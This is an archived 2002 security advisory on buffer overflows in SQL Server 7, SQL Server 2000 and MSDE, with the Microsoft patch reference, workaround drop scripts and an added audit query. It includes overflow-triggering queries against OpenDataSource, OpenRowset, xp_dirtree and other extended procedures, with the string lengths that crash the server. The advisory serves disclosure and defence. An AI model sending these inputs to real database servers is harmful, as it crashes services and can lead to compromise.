25th Feb 2002 [SBWID-5126]
COMMAND
Sql Server buffer overflow
SYSTEMS AFFECTED
MSDE, Sql Server 7, Sql Server 2000
PROBLEM
From Cesar Cerrudo's advisory [CC020201] [CC030202]:
--snip--
OpenDataSource and OpenRowset functions are accessible to all users and
contain an unchecked buffer in one of their parameters. The buffer
overflow and DoS problem occur when an overly long string is supplied
in the "provider name" parameter.
In SQL Server 7 the overflow starts at character number 6819, and if the
amount of characters is >= 6918 the server will crash:
SELECT *
FROM OpenDataSource(
'XXXXXXXXXXX...' ---> 6819 characters or more
,'')...nothing
SELECT * FROM OPENROWSET(
'XXXXXXXXXXX...' ---> 6819 characters or more
,'',
'')
In SQL Server 2000 the overflow starts at character number 6887, and if the
amount of characters is >= 6998 the server will crash:
SELECT *
FROM OpenDataSource(
'XXXXXXXXXXX...' ---> 6887 characters or more
,'')...nothing
SELECT * FROM OPENROWSET(
'XXXXXXXXXXX...' ---> 6887 characters or more
,'',
'')
Depending on the amount of characters, some registry values are overwritten.
Try these examples and then take a look at the dump file.
--snap--
Update (06 March 2002)
======
-Also-
The extended stored procedure xp_dirtree allows ALL users to retrieve
the subdirectory structure of a given drive or folder. A buffer overflow
occurs when an overly long string is supplied:
xp_dirtree 'XXXXXX...'----> many, many X's
or as unicode :
xp_dirtree N'XXXXXX...'----> many, many X's
Update (14 March 2002)
======
Get full details from :
http://www.appsecinc.com/resources/alerts/mssql/02-0000.html
The following extended stored procedures are also affected:
xp_controlqueueservice
xp_createprivatequeue
xp_createqueue
xp_decodequeuecmd
xp_deleteprivatequeue
xp_deletequeue
xp_displayqueuemesgs
xp_dsninfo
xp_mergelineages
xp_oledbinfo
xp_proxiedmetadata
xp_readpkfromqueue
xp_readpkfromvarbin
xp_repl_encrypt
xp_resetqueue
xp_sqlinventory
xp_unpackcab
Sample :
======
xp_proxiedmetadata
Versions vulnerable: SQL Server 2000 and SQL Server 7.0 (xprepl.dll)
Default permissions granted: public
Overflow occurred for Unicode buffers
Code examples:
-- overflow on both SQL Server 7 and 2000 when a Unicode buffer greater than
-- 4000 characters is passed as the first parameter
xp_proxiedmetadata N'AAAAAAAAAA[4000+]', '', '', ''
xp_mergelineages
Versions vulnerable: SQL Server 2000 (xprepl.dll)
Default permissions granted: public
Overflow occurred for Unicode buffers
Code examples:
-- buffer overflow when a Unicode buffer of more than 4000 characters is
-- passed as the first parameter
xp_mergelineages N'AAAAAAAAAA[4000+]', '', ''
SOLUTION
Patch (update 25 July 2002)
=====
See : http://www.microsoft.com/technet/security/bulletin/ms02-038.asp
Workaround
==========
For the second bug, drop the affected extended stored procedures and
their DLL. To remove these extended stored procedures from Microsoft SQL
Server 2000, run the following script:
use master
go
drop procedure xp_decodequeuecmd
go
drop procedure xp_controlqueueservice
go
drop procedure xp_createprivatequeue
go
drop procedure xp_createqueue
go
drop procedure xp_deleteprivatequeue
go
drop procedure xp_deletequeue
go
drop procedure xp_displayqueuemesgs
go
drop procedure xp_mergelineages
go
drop procedure xp_oledbinfo
go
drop procedure xp_proxiedmetadata
go
drop procedure xp_readpkfromqueue
go
drop procedure xp_readpkfromvarbin
go
drop procedure xp_repl_encrypt
go
drop procedure xp_resetqueue
go
drop procedure xp_unpackcab
go
To remove these extended stored procedures from Microsoft SQL Server
7.0, run the following script:
use master
go
drop procedure xp_repl_encrypt
go
drop procedure xp_oledbinfo
go
drop procedure xp_dsninfo
go
drop procedure xp_proxiedmetadata
go
drop procedure xp_sqlinventory
go
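After running either drop script, the following audit query confirms the result. It is an added example, not part of the advisory or of Microsoft's fix: it lists each extended stored procedure named above, whether it still exists in master, the DLL that backs it (from syscomments, as sp_helpextendedproc reports it), and whether PUBLIC still holds EXECUTE on it. It assumes the SQL Server 7.0/2000 system tables sysobjects, syscomments and sysprotects; the #affected table and its column name are this example's own.

```sql
-- Audit query (added example, not from the advisory): one row per extended
-- stored procedure named in the advisory, showing whether it still exists,
-- its backing DLL and whether PUBLIC still holds EXECUTE on it.
-- Assumes SQL Server 7.0/2000 system tables; #affected is this example's own.
USE master
GO
SET NOCOUNT ON

CREATE TABLE #affected (xpname sysname NOT NULL)
INSERT INTO #affected (xpname)
SELECT 'xp_controlqueueservice' UNION ALL SELECT 'xp_createprivatequeue' UNION ALL
SELECT 'xp_createqueue'         UNION ALL SELECT 'xp_decodequeuecmd'     UNION ALL
SELECT 'xp_deleteprivatequeue'  UNION ALL SELECT 'xp_deletequeue'        UNION ALL
SELECT 'xp_displayqueuemesgs'   UNION ALL SELECT 'xp_dsninfo'            UNION ALL
SELECT 'xp_mergelineages'       UNION ALL SELECT 'xp_oledbinfo'          UNION ALL
SELECT 'xp_proxiedmetadata'     UNION ALL SELECT 'xp_readpkfromqueue'    UNION ALL
SELECT 'xp_readpkfromvarbin'    UNION ALL SELECT 'xp_repl_encrypt'       UNION ALL
SELECT 'xp_resetqueue'          UNION ALL SELECT 'xp_sqlinventory'       UNION ALL
SELECT 'xp_unpackcab'           UNION ALL SELECT 'xp_dirtree' -- not covered by the drop scripts

SELECT a.xpname,
       CASE WHEN o.id IS NULL THEN 'dropped' ELSE 'PRESENT' END AS xp_status,
       c.text AS dll,
       CASE WHEN p.id IS NULL THEN '' ELSE 'public has EXECUTE' END AS public_exec
FROM #affected a
LEFT JOIN sysobjects  o ON o.name = a.xpname AND o.xtype = 'X'   -- X = extended proc
LEFT JOIN syscomments c ON c.id = o.id                            -- text = DLL name
LEFT JOIN sysprotects p ON p.id = o.id
                       AND p.uid = USER_ID('public')   -- uid 0 = public role
                       AND p.action = 224              -- 224 = EXECUTE
                       AND p.protecttype IN (204, 205) -- GRANT / GRANT WITH GRANT OPTION
ORDER BY xp_status DESC, a.xpname

DROP TABLE #affected
GO
```

Any row reported as PRESENT with "public has EXECUTE" is still reachable by every login and needs the drop (or the MS02-038 patch) applied.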